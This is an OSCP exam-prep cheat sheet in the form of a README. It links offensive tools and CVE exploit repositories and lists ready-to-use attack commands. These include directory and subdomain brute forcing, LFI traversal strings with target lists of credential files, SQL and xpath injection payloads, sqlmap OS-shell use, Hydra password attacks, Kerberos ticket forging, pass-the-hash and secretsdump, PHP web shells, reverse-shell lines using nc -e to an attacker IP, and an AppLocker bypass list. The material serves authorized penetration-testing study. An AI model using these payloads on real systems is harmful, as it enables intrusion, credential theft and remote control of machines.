README.md

OSCP Cheat Sheet

Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.

Resources

Basics

Tool	URL
Swaks	https://github.com/jetmore/swaks
CyberChef	https://gchq.github.io/CyberChef/

Information Gathering

Tool	URL
Nmap	https://github.com/nmap/nmap
Amass	https://github.com/OWASP/Amass
BloodHound	https://github.com/BloodHoundAD/BloodHound
BloodHound Python	https://github.com/fox-it/BloodHound.py
enum4linux	https://github.com/CiscoCXSecurity/enum4linux

Vulnerability Analysis

Tool	URL
Nuclei	https://github.com/projectdiscovery/nuclei
Sparta	https://github.com/SECFORCE/sparta

Web Application Analysis

Tool	URL
PayloadsAllTheThings	https://github.com/swisskyrepo/PayloadsAllTheThings
ysoserial	https://github.com/frohoff/ysoserial
JSON Web Tokens	https://jwt.io/
httpx	https://github.com/projectdiscovery/httpx
Hakrawler	https://github.com/hakluke/hakrawler
Gobuster	https://github.com/OJ/gobuster
ffuf	https://github.com/ffuf/ffuf
Wfuzz	https://github.com/xmendez/wfuzz
WPScan	https://github.com/wpscanteam/wpscan

Database Assessment

Tool	URL
sqlmap	https://github.com/sqlmapproject/sqlmap

Password Attacks

Tool	URL
Hydra	https://github.com/vanhauser-thc/thc-hydra
Patator	https://github.com/lanjelot/patator
Kerbrute	https://github.com/ropnop/kerbrute
CrackMapExec	https://github.com/byt3bl33d3r/CrackMapExec
SprayingToolkit	https://github.com/byt3bl33d3r/SprayingToolkit
RsaCtfTool	https://github.com/Ganapati/RsaCtfTool
Default Credentials Cheat Sheet	https://github.com/ihebski/DefaultCreds-cheat-sheet

Reverse Engineering

Tool	URL
dnSpy	https://github.com/dnSpy/dnSpy
AvalonialLSpy	https://github.com/icsharpcode/AvaloniaILSpy
ghidra	https://github.com/NationalSecurityAgency/ghidra
pwndbg	https://github.com/pwndbg/pwndbg
cutter	https://github.com/rizinorg/cutter
Radare2	https://github.com/radareorg/radare2
GEF	https://github.com/hugsy/gef
peda	https://github.com/longld/peda
JD-GUI	https://github.com/java-decompiler/jd-gui

Exploitation Tools

Tool	URL
Impacket	https://github.com/SecureAuthCorp/impacket
lsassy	https://github.com/Hackndo/lsassy
Evil-WinRM	https://github.com/Hackplayers/evil-winrm
Metasploit	https://github.com/rapid7/metasploit-framework

Post Exploitation

Tool	URL
PEASS-ng	https://github.com/carlospolop/PEASS-ng
LinEnum	https://github.com/rebootuser/LinEnum
pspy	https://github.com/DominicBreuker/pspy
Watson	https://github.com/rasta-mouse/Watson
WESNG	https://github.com/bitsadmin/wesng
Sherlock	https://github.com/sherlock-project/sherlock
nishang	https://github.com/samratashok/nishang
Shikata Ga Nai	https://github.com/EgeBalci/sgn
Empire	https://github.com/BC-SECURITY/Empire
LaZagne	https://github.com/AlessandroZ/LaZagne
GTFOBins	https://gtfobins.github.io/
LOLBAS	https://lolbas-project.github.io/
powercat	https://github.com/besimorhino/powercat
PowerView	https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
mimikatz	https://github.com/gentilkiwi/mimikatz
pypykatz	https://github.com/skelsec/pypykatz
Rubeus	https://github.com/GhostPack/Rubeus
unicorn	https://github.com/trustedsec/unicorn
printspoofer	https://github.com/dievus/printspoofer
GenericPotato	https://github.com/micahvandeusen/GenericPotato
Juicy Potato	https://github.com/ohpe/juicy-potato
Rotten Potato	https://github.com/breenmachine/RottenPotatoNG
JAWS	https://github.com/411Hall/JAWS
Ping Castle	https://github.com/vletoux/pingcastle
Active Directory Kill Chain Attack & Defense	https://github.com/infosecn1nja/AD-Attack-Defense
Windows-privesc-check	https://github.com/pentestmonkey/windows-privesc-check
Windows Privilege Escalation	https://github.com/frizb/Windows-Privilege-Escalation
Windows Privilege Escalation Fundamentals	https://www.fuzzysecurity.com/tutorials/16.html
Windows Exploits	https://github.com/SecWiki/windows-kernel-exploits
Pre-compiled Windows Exploits	https://github.com/abatchy17/WindowsExploits
static-binaries	https://github.com/andrew-d/static-binaries
SeBackupPrivilege	https://github.com/giuliano108/SeBackupPrivilege
AMSI.fail	http://amsi.fail/
Raikia's Hub	https://raikia.com/tool-powershell-encoder/

CVEs

CVE	URL
CVE-2017-0199	https://github.com/bhdresh/CVE-2017-0199
CVE-2018-16509	https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
CVE-2019-18634	https://github.com/saleemrashid/sudo-cve-2019-18634
CVE-2019-20933	https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
CVE-2019-5736	https://github.com/Frichetten/CVE-2019-5736-PoC
dirty_sock	https://github.com/initstring/dirty_sock
CVE-2020-1472	https://github.com/SecuraBV/CVE-2020-1472
CVE-2020-1472	https://github.com/risksense/zerologon
CVE-2020-8165	https://github.com/masahiro331/CVE-2020-8165
CVE-2021-1675	https://github.com/calebstewart/CVE-2021-1675
CVE-2021-3129	https://github.com/nth347/CVE-2021-3129_exploit
CVE-2021-3490	rapid7/metasploit-framework#15567
CVE-2021-22204	https://github.com/CsEnox/Gitlab-Exiftool-RCE
CVE-2021-26084	https://github.com/Phuong39/CVE-2021-26085
CVE-2021-36934	https://github.com/GossiTheDog/HiveNightmare
CVE-2021-40444	https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
CVE-2020-1751, CVE-2021-41773,42013	https://github.com/MrCl0wnLab/SimplesApachePathTraversal
CVE-2021-42287	https://github.com/WazeHell/sam-the-admin
CVE-2021-42287, CVE-2021-42278	https://github.com/cube0x0/noPac
CVE-2021-43883	https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-44228	https://github.com/woodpecker-appstore/log4j-payload-generator
CVE-2021-44228	https://github.com/mbechler/marshalsec
SystemNightmare	https://github.com/GossiTheDog/SystemNightmare
PetitPotam	https://github.com/topotam/PetitPotam

Exploiting

Tool	URL
PwnTools	https://github.com/Gallopsled/pwntools
checksec	https://github.com/slimm609/checksec.sh
mona	https://github.com/corelan/mona
Ropper	https://github.com/sashs/Ropper
Buffer Overflow	https://github.com/gh0x0st/Buffer_Overflow

Wordlists

Tool	URL
SecLists	https://github.com/danielmiessler/SecLists
CeWL	https://github.com/digininja/cewl
CUPP	https://github.com/Mebus/cupp

Social Media Resources

Name	URL
IppSec (YouTube)	https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
IppSec.rocks	https://ippsec.rocks/?#
0xdf	https://0xdf.gitlab.io/
HackTricks	https://book.hacktricks.xyz/
Hacking Articles	https://www.hackingarticles.in/
Rana Khalil	https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

Commands

Basics

CentOS

doas -u <user> /bin/sh

Certutil

certutil -urlcache -split -f "http://<local_ip>/<file>" <file>

Chisel

./chisel server -p 9002 -reverse -v
./chisel client <remote_ip>:9002 R:9003:127.0.0.1:8888

gcc

gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.c

Netcat

nc -lnvp <local_port> < <file>
nc <remote_ip> <remote_port> > <file>

PHP Webserver

sudo php -S 127.0.0.1:80

Ping

ping -c 1 <remote_ip>
ping -n 1 <remote_ip>

Python Webserver

sudo python -m SimpleHTTPServer 80
sudo pyhton3 -m http.server 80

RDP

xfreerdp /v:<remote_ip> /u:<user> /p:<password> +clipboard
rdesktop <remote_ip>

SSH

ssh user@<remote_ip> -oKexAlgorithms=+diffie-hellman-group1-sha1

ssh -R 8080:<local_ip>:80 <remote_ip>
ssh -L 8000:127.0.0.1:8000 <user>@<remote_ip>
ssh -N -L 1234:127.0.0.1:1234 <user>@<remote_ip>

ssh -L 80:<local_ip>:80 <remote_ip>
ssh -L 127.0.0.1:80:<local_ip>:80 <remote_ip>
ssh -L 80:localhost:80 <remote_ip>

tmux

ctrl b + w    # show windows
ctrl + "      # split window horizontal
ctrl + %      # split window vertical
ctrl + ,      # rename window
ctrl + {      # flip window
ctrl + }      # flip window
ctrl + spacebar    # switch pane layout

Copy & Paste

1. ctrl b + [
2. space
3. alt w
4. ctrl b + ]

Search

ctrl b + [    # enter copy
ctrl + /      # enter search while within copy mode for vi mode
n             # search next
shift + n     # reverse search

Upgrading Shells

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl + z
stty raw -echo
fg
Enter
Enter
export XTERM=xterm

vi

:w !sudo tee %    # save file with elevated privileges without exiting

Windows Command Formatting

echo "<command>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

Information Gathering

Nmap

sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <remote_ip>    # discovery scan
sudo nmap -A -T4 -sC -sV --script vuln <remote_ip>    # vulnerability scan
sudo nmap -sU <remote_ip>    # udp scan
sudo nmap -sC -sV -p- --scan-delay 5s <remote_ip>    # delayed scan
sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <remote_ip>    # kerberos enumeration
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb

DNS

Reverse DNS

whois <domain>
host <remote_ip> <remote_ip>
host -l <domain> <remote_ip>
dig @<remote_ip> -x <domain>
dig {a|txt|ns|mx} <domain>
dig {a|txt|ns|mx} <domain> @ns1.<domain>
dig axfr @<remote_ip> <domain>           # zone transfer - needs tcp DNS - port 53

ldapsearch

ldapsearch -x -w <password>
ldapsearch -x -h <remote_ip> -s base namingcontexts
ldapsearch -x -b "dc=<target_domain>,dc=local" "*" -h <remote_ip> | awk '/dn: / {print $2}'
ldapsearch -x -D "cn=admin,dc=<target_domain>,dc=local" -s sub "cn=*" -h <remote_ip> | awk '/uid: /{print $2}' | nl
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
ldapsearch -x -h <remote_ip> -D "<user>"  -b "dc=<target_domain>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

sslyze

sslyze --heartbleed <remote_ip>

SMB / NetBIOS

nbtscan <remote_ip>
enum4linux -a <remote_ip>

Vulnerability Analysis

finger

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t <remote_ip>

Nuclei

./nuclei -target https://<target_url> -t nuclei-templates    # basic syntax with path to templates
./nuclei -target https://<target_url> -t nuclei-templates -rate-limit 5    # rate limiting
./nuclei -target https://<target_url> -t nuclei-templates -header 'User-Agent: Pentesting -H 'X-OSCP-EXAM: oscp_exam'    # set headers

Web Application Analysis

Asset Discovery

curl -s -k "https://jldc.me/anubis/subdomains/example.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<target_url>/FUZZ -mc 200,204,301,302,307,401 -o results.txt

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<target_url>/ -H "Host: FUZZ.<target url>" -fs 185

ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<target_url>/backups/backup_2020070416FUZZ.zip

ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<target_url>/admin../admin_staging/index.php?page=FUZZ -fs 15349

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<remote_ip>/

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<remote_ip> -x php

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<remote_ip> -x php,txt,html,js -e -s 200

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<remote_ip>:<remote_port>/ -b 200 -k --wildcard

gobuster dns -d <target_domain> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Hakrawler

hakrawler -url <remote_ip> -depth 3
hakrawler -url <remote_ip> -depth 3 -plain
hakrawler -url <remote_ip> -depth 3 -plain | httpx -http-proxy http://127.0.0.1:8080

Local File Inclusion Vulnerability

http://<target_domain>/<file>.php?file=
http://<target_domain>/<file>.php?file=../../../../../../../../etc/passwd
http://<target_domain>/<file>/php?file=../../../../../../../../../../etc/passwd

Until php 5.3

http://<target_domain>/<file>/php?file=../../../../../../../../../../etc/passwd%00

Encoded Traversal Strings

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

Base64 Execution Bypass

http://<remote_ip>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d <file>.php

Linux Files

/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/motd
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/passwd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/stat
/proc/swaps
/proc/version
/proc/self/net/arp
/proc/sched_debug
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/<vhost>/__init__.py
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession

Windows Files

C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<remote_ip>:<remote_port>/FUZZ/<file>.php --hc '403,404'

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<remote_ip:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c

wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<target_url>" --hc 200 --hw 356 -t 100 <remote_ip>

wfuzz -X POST -u "http://<remote_ip>:<remote_port>/login.php" -d "email=FUZZ&password=<password>" -w /path/to/wordlist.txt --hc 200 -c

wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<remote_ip>/select

wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<target_domain>" -u http://<target_domain> --hw <value> -t 100

wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip

WPScan

wpscan --url https://<remote_ip> --disable-tls-checks
wpscan --url https://<remote_ip> --disable-tls-checks --enumerate u
target=<remote_ip>; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan --url http://<remote_ip> -U <user> -P passwords.txt -t 50

ysoserial

java -jar ysoserial-master-SNAPSHOT.jar
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'nc <local_ip> <local_port> -e /bin/sh' | base64 -w 0
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections4 "$jex" > /tmp/$filename.session

Database Analysis

Basic Commands:

show databases;
use <db>;
show tables;
SELECT * FROM *;
mysql -u <user> -h <host> -p

SQLInjection

' or '1'='1
admin' or '1'='1
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

sqlmap

--batch         # don't ask any questions
--current-db    # dumps database

sqlmap --list-tampers

sqlmap -r <file>.reg -p id
sqlmap -r <file>.reg -p id --dump
sqlmap -r <file>.reg --level 5 --risk 3 --threads 10
sqlmap -r <file>.reg --level 5 --risk 3 --tables
sqlmap -r <file>.reg --level 5 --risk 3 --tables users --dump --threads 10
sqlmap -r <file>.reg -p id --passwords
sqlmap -r <file>.reg -p id --read-file+/etc/passwd
sqlmap -R <file>.reg -p id --os-cmd=whoami
sqlmap -u 'http://<remote_ip>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq"
sqlmap -u 'http://<remote_ip>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" --os-shell

sqsh

sqsh -S <remote_ip> -U <user>

SQL Truncation Attack

'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'

xpath Injection

test' or 1=1 or 'a'='a
test' or 1=2 or 'a'='a
'or substring(Password,1,1)='p' or'    # checking letter "p" on the beginning of the password
'or substring(Password,2,1)='p' or'    # checking letter "p" on the second position of the password

Password Attacks

fcrack

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <file>.zip

Hydra

export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY

hydra <remote_ip> http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -l root@localhost -P otrs-cewl.txt -vV -f

hydra -l admin -P /usr/share/wordlists/rockyou.txt <remote_ip> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"

John

/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <file>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <file>
john --show <file>

Exploitation Tools

Impacket

Basic Commands

psexec.py <user>@<remote_ip>
sudo impacket-smbserver local . -smb2support
rpcdump.py <target_domain>/<user>:<password/hash>@<remote_ip>
smbclient.py <target_domain>/<user>:<password/hash>@<remote_ip>
lookupsid.py <target_domain>/<user>:<password/hash>@<remote_ip>
reg.py <target_domain>/<user>:[password:password hash]@<remote_ip> <action> <action>

Database Connections

mssqlclient.py <user>@<remote_ip>
mssqlclient.py <user>@<remote_ip> -windows-auth

Forging Silver Ticket

getST.py intelligence.htb/svc_int$  -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator

ASPRepRoast

GetNPUsers.py <target_domain>.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

PassTheHash

getTGT.py <domain>.local/<user> -dc-ip <domain>.local -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c

SecretsDump

secretsdump.py <domain>/<user>@<remote_ip>
secretsdump.py -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash

Web Shells

/usr/share/webshells
<?php echo shell_exe(($_GET['cmd']); ?>

<?php echo "test";?>
<?php system($_GET['cmd']);?>

<?php file_put_contents($_GET['upload'], file_get_contents("http://<local_ip>:<local_port>/" . $_GET['upload']); ?>

<?php if (isset($_GET['upload'])) {file_put_contents($_GET['upload'], file_get_contents("http://<local_ip>:<local_port>/" . $_GET['upload'])); }; if (isset($_GET['cmd'])) { system($_GET['cmd']); };?>

Post Exploitation

AppLocker Bypass List

Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

autologon

powershell -c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users\Public\Downloads\nc.exe' -argumentlist '-e cmd <local_ip> <local_port>' -Credential $cred"

Bash Privilege Escalation

sudo -u#-1 /bin/bash

Basic Linux Enumeration

id
sudo -l
uname -a
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home

Basic Windows Enumeration

systeminfo
whoami /all
net users
net users <user>

Evil-WinRM

sudo ruby /usr/local/bin/evil-winrm -i <remote_ip> -u <user> -p <password>

find Commands

find ./ -type f -exec grep --color=always -i -I 'password' {} \;

find / -group <group> 2>/dev/null

find / -user <user> 2>/dev/null
find / -user <user> -ls 2>/dev/null
